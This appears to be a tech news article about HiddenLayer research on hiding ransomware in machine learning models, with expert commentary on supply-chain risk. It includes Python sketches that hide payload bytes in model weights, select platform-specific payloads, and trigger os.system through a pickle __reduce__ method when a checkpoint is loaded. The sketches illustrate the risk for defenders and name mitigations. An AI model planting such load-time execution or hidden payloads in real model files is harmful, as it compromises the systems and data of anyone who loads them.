As if defenders of the software supply chain didn’t have enough attack vectors to worry about, they now have a new one: machine learning models.

ML models are at the heart of technologies such as facial recognition and chatbots. Like open-source software repositories, models are often downloaded and shared by developers and data scientists, so a compromised model can have effects on multiple organizations at once.

Researchers from machine learning security company HiddenLayer revealed in a blog post on Tuesday how an attacker could use a popular ML model to deploy ransomware.

The method described by the researchers is similar to how hackers use steganography to hide malicious payloads in images. In the case of ML models, the malicious code is hidden in the model’s data.

According to the researchers, the steganography process is quite general and can be applied to most ML libraries. They added that the process need not be limited to embedding malicious code in models and can also be used to exfiltrate data from an organization.
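
HiddenLayer has not published its tooling, but the general idea (scattering a payload's bits across the least-significant bits of a model's floating-point weights, where they barely affect accuracy) can be sketched in a few lines of Python. The function names and the one-bit-per-weight scheme below are illustrative assumptions, not HiddenLayer's code.

```python
# Illustrative sketch only: hide arbitrary bytes in the low bit of each float32
# weight of a tensor. Flipping the low-order bit changes a weight by a negligible
# amount, so the model still works while carrying the payload.
import numpy as np

def embed_payload(weights: np.ndarray, payload: bytes) -> np.ndarray:
    """Return a copy of `weights` with `payload` hidden in the low bits."""
    bits = np.unpackbits(np.frombuffer(payload, dtype=np.uint8))
    flat = weights.astype(np.float32).ravel()
    if bits.size > flat.size:
        raise ValueError("payload too large for this tensor")
    as_ints = flat.view(np.uint32)
    as_ints[: bits.size] = (as_ints[: bits.size] & ~np.uint32(1)) | bits
    return as_ints.view(np.float32).reshape(weights.shape)

def extract_payload(weights: np.ndarray, n_bytes: int) -> bytes:
    """Recover the first `n_bytes` hidden by embed_payload."""
    as_ints = weights.astype(np.float32).ravel().view(np.uint32)
    bits = (as_ints[: n_bytes * 8] & 1).astype(np.uint8)
    return np.packbits(bits).tobytes()

# Round-trip check on a toy "layer"
layer = np.random.rand(64, 64).astype(np.float32)
secret = b"demo payload"
assert extract_payload(embed_payload(layer, secret), len(secret)) == secret
```

An attacker would embed shellcode or a script rather than a text string, but the mechanics work in either direction, which is also why the researchers note the technique can be used to extract data as well as plant it.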

Machine learning model hijacking (Image Courtesy of HiddenLayer)


Attacks can also be operating-system agnostic. The researchers pointed out that OS- and architecture-specific payloads can be embedded in the model, where they can be loaded dynamically at runtime depending on the platform.
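
As a rough illustration of that platform check, a loader hidden in a model could key its embedded blobs by operating system and CPU architecture. The names and lookup scheme below are invented for the example.

```python
# Hypothetical sketch: pick which embedded payload matches the machine the model
# was loaded on. The dictionary keys and blob names are assumptions for the example.
import platform
from typing import Optional

EMBEDDED_PAYLOADS = {
    ("Windows", "AMD64"): "payload_win_x64",
    ("Linux", "x86_64"): "payload_linux_x64",
    ("Darwin", "arm64"): "payload_macos_arm64",
}

def select_payload_name() -> Optional[str]:
    """Return the identifier of the blob to decode for this OS/architecture."""
    return EMBEDDED_PAYLOADS.get((platform.system(), platform.machine()))
```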

Flying Under the Radar

Tom Bonner, senior director of adversarial threat research at Austin, Texas-based HiddenLayer, said that embedding malware in ML models provides some advantage to an adversary.

“It allows them to fly under the radar,” Bonner told TechNewsWorld. “This is not a technology that is detected by current antivirus or EDR software.”

“It also opens up new targets for them,” he said. “It’s a direct route into data scientists’ systems. It’s possible to dump machine learning models on public repositories. Data scientists will pull them down and load them up, and then they’re compromised.”

“These models are also downloaded to various machine-learning ops platforms, which can be very scary because they can have access to Amazon S3 buckets and steal training data,” he continued.

“Most of the machines running machine-learning models tend to have bigger, fatter GPUs, so bitcoin miners can be very effective on those systems as well,” he said.

HiddenLayer demonstrated how a hijacked pre-trained ResNet model executed a ransomware sample the moment it was loaded into memory by PyTorch on its test machine.
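
The reason a model file can run anything at load time is that standard PyTorch checkpoints are serialized with Python’s pickle, and a crafted object’s __reduce__ method tells the unpickler to call an arbitrary function during deserialization. The sketch below is a generic illustration of that mechanism, not HiddenLayer’s exact exploit; it uses a harmless echo command and a made-up file name in place of ransomware.

```python
# Generic pickle-deserialization sketch (harmless stand-in payload).
import os
import torch

class MaliciousStub:
    def __reduce__(self):
        # pickle records this call; the unpickler executes it when the file is loaded
        return (os.system, ("echo payload would run here",))

torch.save({"model_state": MaliciousStub()}, "resnet_checkpoint.pt")

# Loading with full pickle deserialization triggers the call immediately.
# Recent PyTorch releases default to weights_only=True, which blocks this path.
torch.load("resnet_checkpoint.pt", weights_only=False)
```

Loading checkpoints with weights_only=True, or distributing weights in a pickle-free format such as safetensors, closes off this particular execution path, though it does not address payloads hidden in the weights themselves.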


First Mover Advantage

Chris Clements, vice president of solutions architecture at Cerberus Sentinel, a cybersecurity consulting and penetration testing company in Scottsdale, Ariz., noted that attackers often like to exploit unanticipated vulnerabilities in new technologies.

“Attackers looking for a first-mover advantage in these frontiers can exploit new technologies before defenders are prepared or have proactive protections in place,” Clements told TechNewsWorld.

“This attack on machine-learning models looks like it could be the next phase of the cat-and-mouse game between attackers and defenders,” he said.

Threat actors will take advantage of whatever vectors they can to carry out their attacks, explained Mike Parkin, senior technical engineer at Vulcan Cyber, a provider of SaaS for enterprise cyber risk remediation in Tel Aviv, Israel.

“It’s an unusual vector that can slip past some common tools if done carefully,” Parkin told TechNewsWorld.

Traditional anti-malware and endpoint detection and response solutions are designed to detect ransomware based on pattern-based behaviors, including virus signatures and the monitoring of key API, file, and registry requests on Windows for potential malicious activity, explained Morey Haber, chief security officer at BeyondTrust, a developer of privileged account management and vulnerability management solutions in Carlsbad, Calif.

“If machine learning is applied to the delivery of malware such as ransomware, traditional attack vectors and even detection methods can be changed to appear non-malicious,” Haber told TechNewsWorld.

Potential for Extensive Damage

Attacks on machine-learning models are on the rise, said Karen Crowley, director of product solutions at Deep Instinct, a deep-learning cybersecurity company in New York City.

“It’s not critical yet, but widespread damage is likely,” Crowley told TechNewsWorld.

“In the supply chain, if the data is poisoned so that when the model is trained, the system is also poisoned, then that model can make decisions that reduce rather than strengthen protection,” she explained.

“In the cases of Log4j and SolarWinds, we saw an impact not only on the organization that has the software, but on all of its users in that chain,” she said. “Once ML is introduced, the damage can add up quickly.”

Casey Ellis, CTO and founder of Bugcrowd, which operates a crowdsourced bug bounty platform, said attacks on ML models could be part of a larger trend of attacks on software supply chains.

“Just as adversaries can attempt to compromise the supply chain of software applications to insert malicious code or vulnerabilities, they can also target the supply chain of machine learning models to insert malicious or biased data or algorithms,” Ellis told TechNewsWorld.

“This can have a significant impact on the reliability and integrity of AI systems and can be used to undermine trust in the technology,” he said.

Pablum for Script Kiddies

Threat actors may show increased interest in ML models because the models are more vulnerable than people thought.

“People have known this was possible for a while, but they didn’t realize how easy it was,” Bonner said. “It’s fairly trivial to put together an attack with a few simple scripts.”

“Now that people have realized how easy it is, it’s within the realm of script kiddies,” he added.

Clements agreed that the researchers have shown that it does not require hardcore ML/AI data science expertise to insert malicious commands into training data that can then be triggered by ML models at runtime.

However, he continued, it requires more sophistication than run-of-the-mill ransomware attacks that rely primarily on simple credential stuffing or phishing to launch.

“Right now, I think the popularity of this specific attack vector is likely to remain limited for the foreseeable future,” he said.

“Exploiting this requires either compromising an upstream ML model project used by downstream developers, or getting the victim to download a pre-trained ML model with embedded malicious commands from an unauthenticated source,” he explained.

“In each of these scenarios,” he continued, “it appears that there would be much easier and more straightforward ways to compromise the target than inserting obfuscated exploits into the training data.”
